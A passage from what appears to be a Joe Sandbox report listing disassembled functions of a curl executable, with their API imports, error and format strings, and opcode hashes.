Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: inet_ptonstrcspnstrncmpstrspn
String ID: /:#?!@$0123456789abcdefABCDEF:.
API String ID: 3548342379-4134865206
Opcode ID: bb44e831456dfa347d751db6e0baa9830d5133fbc23f8f1b71ac9e1147d56e42
Instruction ID: b1a43d9d3ce90408fd390e8ccb439379fae6153d72d2fcb2f4e75d9cf209e774
Opcode Fuzzy Hash: bb44e831456dfa347d751db6e0baa9830d5133fbc23f8f1b71ac9e1147d56e42
Instruction Fuzzy Hash: 3951E632B0468444FF21CF29E5143EB3BA0E755B94F881239DA9A877D6DA3CC647C700

Function 000000013F4838F4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 121fileCOMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F483922
fopen.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F483934
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F483AA8

Strings

%s, xrefs: 000000013F4839A1, 000000013F4839E4, 000000013F483A24, 000000013F483A57
%s, xrefs: 000000013F483972, 000000013F483A85
Failed to open %s to write libcurl code!, xrefs: 000000013F483948

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __acrt_iob_funcfclosefopen
String ID: %s$%s$Failed to open %s to write libcurl code!
API String ID: 4110152555-3591596397
Opcode ID: 0652a37ee7b5bcfae27d71eb5067b0ec01d946506927eda22150fd89cb44c300
Instruction ID: 278baaa249595a03a3367e997d6a70e84a81cba86cfdfbd5560f5cca182811e7
Opcode Fuzzy Hash: 0652a37ee7b5bcfae27d71eb5067b0ec01d946506927eda22150fd89cb44c300
Instruction Fuzzy Hash: 85514731F05B8081FB159F16A6413EBABA1A745BD0F58903ECE0E1779AEB29D757C300

Function 000000013F48142C Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 117COMMON

Download Yara Rule

APIs

fputs.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F4814F2
fputc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F4815B4

Strings

%02x , xrefs: 000000013F4814D7
%04zx: , xrefs: 000000013F4814AE
%s%s, %zu bytes (0x%zx), xrefs: 000000013F481465
, xrefs: 000000013F4814EB

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: fputcfputs
String ID: $%02x $%04zx: $%s%s, %zu bytes (0x%zx)
API String ID: 269475090-2180745030
Opcode ID: e667a42dea6e0931ca065ad3ff9bf56e4211da3d6f41bf62412307818aaba387
Instruction ID: fef86d9392d6f5f6d030b41cad1c5ad0e139d0afb5e972117468147671da91a4
Opcode Fuzzy Hash: e667a42dea6e0931ca065ad3ff9bf56e4211da3d6f41bf62412307818aaba387
Instruction Fuzzy Hash: F941B172F1479086FB608F29E5443DB7BA1B391B94F54443BCE9A037A9CA39D287C701

Function 000000013F4A6414 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 115COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 000000013F4A64FA
_scwprintf.LIBCMT ref: 000000013F4A658E

Strings

Proxy-, xrefs: 000000013F4A6572
%.*s, xrefs: 000000013F4A64EE
Digest, xrefs: 000000013F4A642C
%sAuthorization: Digest %s, xrefs: 000000013F4A6583

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _scwprintf
String ID: %.*s$%sAuthorization: Digest %s$Digest$Proxy-
API String ID: 1992661772-3976116069
Opcode ID: 5b09aa6f8acaafc9d2de3519143bf6550a570d9705a8426d8d1e31a313ac39ec
Instruction ID: 1814845a95bbb09a1d1bb2c16204486ab62c19fd71506fc56db44e143fd95f75
Opcode Fuzzy Hash: 5b09aa6f8acaafc9d2de3519143bf6550a570d9705a8426d8d1e31a313ac39ec
Instruction Fuzzy Hash: 04513336A04B8886EB10DF06E8443DA37A4F789F80F54013AEE4D877A5EB39C65AC740

Function 000000013F4B18D4 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F4B1A5E

Strings

seek callback returned error %d, xrefs: 000000013F4B19A9
ioctl callback returned error %d, xrefs: 000000013F4B1A36
the ioctl callback returned %d, xrefs: 000000013F4B1A20
Cannot rewind mime/post data, xrefs: 000000013F4B1A7B
necessary data rewind wasn't possible, xrefs: 000000013F4B1A69

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: fseek
String ID: Cannot rewind mime/post data$ioctl callback returned error %d$necessary data rewind wasn't possible$seek callback returned error %d$the ioctl callback returned %d
API String ID: 623662203-539828175
Opcode ID: 0b93f7b85dce4fe74bb60d9d9cb372e8008735c429542c52453302256134090e
Instruction ID: 1cd9947b939da85a400eb6d4c47fdda21e4027240a27de535b7c57f0db2b0eff
Opcode Fuzzy Hash: 0b93f7b85dce4fe74bb60d9d9cb372e8008735c429542c52453302256134090e
Instruction Fuzzy Hash: 2D513232B01B8584FB558F65D4447EA27A1E788F98F4C813ADE8E4B396DF38CA46D710

Function 000000013F4929FC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F492A48
calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F492A6D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F492A7E
__swprintf_l.LIBCMT ref: 000000013F492B0C

Strings

curl: (%d) %s, xrefs: 000000013F492B19
%s in URL position %zu:%s%*s^, xrefs: 000000013F492AED

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __swprintf_lcallocfreemalloc
String ID: %s in URL position %zu:%s%*s^$curl: (%d) %s
API String ID: 1630718902-2317922172
Opcode ID: d93977fb3abb3e95e852c30432a02b8bfde4792691e35e55328ad6f69930b746
Instruction ID: 1e2013d23fdef1606a46c78abe5ebb57aeda0187d868c2d16001a152ea952fe5
Opcode Fuzzy Hash: d93977fb3abb3e95e852c30432a02b8bfde4792691e35e55328ad6f69930b746
Instruction Fuzzy Hash: 26317A32B0578486FB61CF55E8507EB77A0B785B94F584239EE590B7C5EB3CC6468700

Function 000000013F491728 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F4917A0
__swprintf_l.LIBCMT ref: 000000013F491829

Strings

curl_easy_setopt(hnd, %s, , xrefs: 000000013F491794
%*s, xrefs: 000000013F491818
%s(long)%s%s, xrefs: 000000013F4917CE
%s%luUL);, xrefs: 000000013F49184A

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __swprintf_l
String ID: %*s$%s%luUL);$%s(long)%s%s$curl_easy_setopt(hnd, %s,
API String ID: 1488884202-843713100
Opcode ID: 035ff6a2d2c7669cc04a8a975685340e3e537cccc4e63445aaa86cc8daf22141
Instruction ID: 2df51bb9c547875400ce4fb7ea26a91abd7713f7a5ddebd8a02d3b61accc208e
Opcode Fuzzy Hash: 035ff6a2d2c7669cc04a8a975685340e3e537cccc4e63445aaa86cc8daf22141
Instruction Fuzzy Hash: FB315932B04B4196FB60CB15E800BEB63A1F7947A4F45423AE95D83795EF38CA0AC740

Function 000000013F4915D0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 84COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49163A
__swprintf_l.LIBCMT ref: 000000013F4916CD

Strings

curl_easy_setopt(hnd, %s, , xrefs: 000000013F491629
%*s, xrefs: 000000013F4916BC
%s(long)%s%s, xrefs: 000000013F491672
%s%ldL);, xrefs: 000000013F4916EE

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __swprintf_l
String ID: %*s$%s%ldL);$%s(long)%s%s$curl_easy_setopt(hnd, %s,
API String ID: 1488884202-3167448197
Opcode ID: d883462d4f363a7398a52ea1896f0bdb0d4288d449e206b74f2286734631dcfb
Instruction ID: d8ff47b587ef7266466b5c1402e99b8e766ece7eee1f565cb55ab1e55bd332e9
Opcode Fuzzy Hash: d883462d4f363a7398a52ea1896f0bdb0d4288d449e206b74f2286734631dcfb
Instruction Fuzzy Hash: B6317A32B14B4696FB608F24E8107E763A0F794794F48023AE95D87399EF38CA0AC740

Function 000000013F4B72CC Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 79COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 000000013F4B733F
_scwprintf.LIBCMT ref: 000000013F4B73BA

Strings

Basic, xrefs: 000000013F4B72D5
%sAuthorization: Basic %s, xrefs: 000000013F4B73AC
%s:%s, xrefs: 000000013F4B7334
Proxy-, xrefs: 000000013F4B73A2

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _scwprintf
String ID: %s:%s$%sAuthorization: Basic %s$Basic$Proxy-
API String ID: 1992661772-2466770355
Opcode ID: 444764fe44966ccb04671568f70d680a79f000c40923b4e270f62c6d23e680ac
Instruction ID: 93f92afb2a758a35e22797cbbff088e28229b5830dfb1aa3422e955bc92366b7
Opcode Fuzzy Hash: 444764fe44966ccb04671568f70d680a79f000c40923b4e270f62c6d23e680ac
Instruction Fuzzy Hash: 17314B36A00B4886EA01CB16E4943DB63E0F784BA0F540639EE5D4B7A1DF3CCA4BC740

Function 000000013F48A880 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

_fstat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,000000013F48F212), ref: 000000013F48A8F3
_close.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,000000013F48F212), ref: 000000013F48A995
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,000000013F48F212), ref: 000000013F48A99C
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,000000013F48F212), ref: 000000013F48A9A5

Strings

CURLOPT_INFILESIZE_LARGE, xrefs: 000000013F48A930
Can't open '%s'!, xrefs: 000000013F48A97D

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __acrt_iob_func_close_fileno_fstat64
String ID: CURLOPT_INFILESIZE_LARGE$Can't open '%s'!
API String ID: 2044818932-219864042
Opcode ID: 9e5caa2ea7142887d4652a8f2237605d8093238c2f9386ff19676f5c6d29fc83
Instruction ID: 8126bc7099872c83c9eb1b646db80851519ed83973602747b0f7a21817dbf4cd
Opcode Fuzzy Hash: 9e5caa2ea7142887d4652a8f2237605d8093238c2f9386ff19676f5c6d29fc83
Instruction Fuzzy Hash: D231E471A0968055FB648F39D4403EB3B92E785BA4F144239EA6D837D5DE7DC54BC700

Function 000000013F48A530 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 70COMMON

Download Yara Rule

APIs

_mbscmp.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 000000013F48A56D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F48A5C1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F48A608

Part of subcall function 000000013F483434: CreateToolhelp32Snapshot.API-MS-WIN-CORE-TOOLHELP-L1-1-0 ref: 000000013F483474
Part of subcall function 000000013F483434: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F483483
Part of subcall function 000000013F483434: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 000000013F4834A1

Part of subcall function 000000013F4950D8: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000050,000000013F489CBC), ref: 000000013F4950F9

Strings

%s, xrefs: 000000013F48A58A
--dump-module-paths, xrefs: 000000013F48A566
curl: (%d) Windows-specific init failed., xrefs: 000000013F48A5CA

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __acrt_iob_func$CloseCreateErrorHandleLastSnapshotToolhelp32_mbscmpfflush
String ID: %s$--dump-module-paths$curl: (%d) Windows-specific init failed.
API String ID: 3305726359-2839915597
Opcode ID: 51d3f952d5486a1e4184ae4cef3c75db60b7ad3a98940e0d09750bcb46ffc886
Instruction ID: f964f8130e29c624b0d44f0bb67b4452ae7915551c1fa3ba685007ead6cd5497
Opcode Fuzzy Hash: 51d3f952d5486a1e4184ae4cef3c75db60b7ad3a98940e0d09750bcb46ffc886
Instruction Fuzzy Hash: 7621A136B00A4592FB24AB25E8513EB27A1B794BC0F54803DDE4D9379AEE69CB47C300

Function 000000013F48A2D4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F48A2F0
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48A30A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48A3C7

Strings

error initializing curl library, xrefs: 000000013F48A3B4
error retrieving curl library information, xrefs: 000000013F48A3AB
error initializing curl, xrefs: 000000013F48A3CF

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __acrt_iob_funcfreemalloc
String ID: error initializing curl$error initializing curl library$error retrieving curl library information
API String ID: 2771806388-2118345949
Opcode ID: dd575ed8b6c6299a1a2e1f6c36b0cd8dc25f3b8e35c63980b42d970212e875bd
Instruction ID: 0e93a8d152957deb92bf98c18c46b4e80adf6fdccead5e7340825cc8e48d8788
Opcode Fuzzy Hash: dd575ed8b6c6299a1a2e1f6c36b0cd8dc25f3b8e35c63980b42d970212e875bd
Instruction Fuzzy Hash: 9A31A072905B8096E3509F25D4403DE3BA1F304BA8F58423CDB694B7C6EFB9C652C720

Function 000000013F4A32F4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59networkCOMMON

Download Yara Rule

APIs

getsockname.WS2_32 ref: 000000013F4A3342
WSAGetLastError.WS2_32 ref: 000000013F4A334C

Part of subcall function 000000013F49E9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49E9E3
Part of subcall function 000000013F49E9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49E9EB
Part of subcall function 000000013F49E9C8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49E9FB
Part of subcall function 000000013F49E9C8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49EA05
Part of subcall function 000000013F49E9C8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49EA18
Part of subcall function 000000013F49E9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49EAA8
Part of subcall function 000000013F49E9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49EAB3
Part of subcall function 000000013F49E9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49EABC
Part of subcall function 000000013F49E9C8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49EAC8

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F4A3387
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F4A338F

Strings

getsockname() failed with errno %d: %s, xrefs: 000000013F4A3366
ssloc inet_ntop() failed with errno %d: %s, xrefs: 000000013F4A33AA

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _errno$ErrorLast$__sys_errlist__sys_nerrgetsocknamestrncpy
String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
API String ID: 2903212608-2605427207
Opcode ID: c4ac1885f2370baf8d85bdaf03f3be84f3e363e354a6cfa8ec9d91e95885fd1b
Instruction ID: 49bfd4aecdf485428455ebdcc79c909df4a801f6d99c8fdda89dfdc885ec0bd5
Opcode Fuzzy Hash: c4ac1885f2370baf8d85bdaf03f3be84f3e363e354a6cfa8ec9d91e95885fd1b
Instruction Fuzzy Hash: 06212E72B1578196FA609B56E4447EB7351BB89B84F844039EE4D0779AEF2CD60A8B00

Function 000000013F4A320C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56networkCOMMON

Download Yara Rule

APIs

getpeername.WS2_32 ref: 000000013F4A3256
WSAGetLastError.WS2_32 ref: 000000013F4A3260

Part of subcall function 000000013F49E9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49E9E3
Part of subcall function 000000013F49E9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49E9EB
Part of subcall function 000000013F49E9C8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49E9FB
Part of subcall function 000000013F49E9C8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49EA05
Part of subcall function 000000013F49E9C8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49EA18
Part of subcall function 000000013F49E9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49EAA8
Part of subcall function 000000013F49E9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49EAB3
Part of subcall function 000000013F49E9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49EABC
Part of subcall function 000000013F49E9C8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49EAC8

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F4A32A1
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F4A32A9

Strings

ssrem inet_ntop() failed with errno %d: %s, xrefs: 000000013F4A32C4
getpeername() failed with errno %d: %s, xrefs: 000000013F4A327A

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _errno$ErrorLast$__sys_errlist__sys_nerrgetpeernamestrncpy
String ID: getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
API String ID: 1595226642-4047410615
Opcode ID: 3935a7dc25cb01853878d93bc9c5b6711891ab3ee3726f6dfd06770b26f74baa
Instruction ID: 3d7d31d0be26a69c4610a84b07b5d85d3234cb0cfbd038386fcf2de35a1e1e88
Opcode Fuzzy Hash: 3935a7dc25cb01853878d93bc9c5b6711891ab3ee3726f6dfd06770b26f74baa
Instruction Fuzzy Hash: 7F215E72B1468192FB619B66E4447DB7361BB88B84F804039AA4D0779AEF2CC70BCB00

Function 000000013F483344 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

SearchPathA.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-2-0 ref: 000000013F4833B6
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F4833C5
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4833D4
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F4833E9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4833F8

Strings

curl-ca-bundle.crt, xrefs: 000000013F483396

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _strdupfree$PathSearch
String ID: curl-ca-bundle.crt
API String ID: 4109318298-694051528
Opcode ID: b49543137be32970d793e18ebee1d1012d02deb88f2d5d3c8d23ded886a85623
